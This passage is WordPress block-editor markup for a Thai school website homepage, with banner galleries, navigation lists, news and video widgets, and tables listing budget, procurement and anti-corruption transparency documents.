{\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 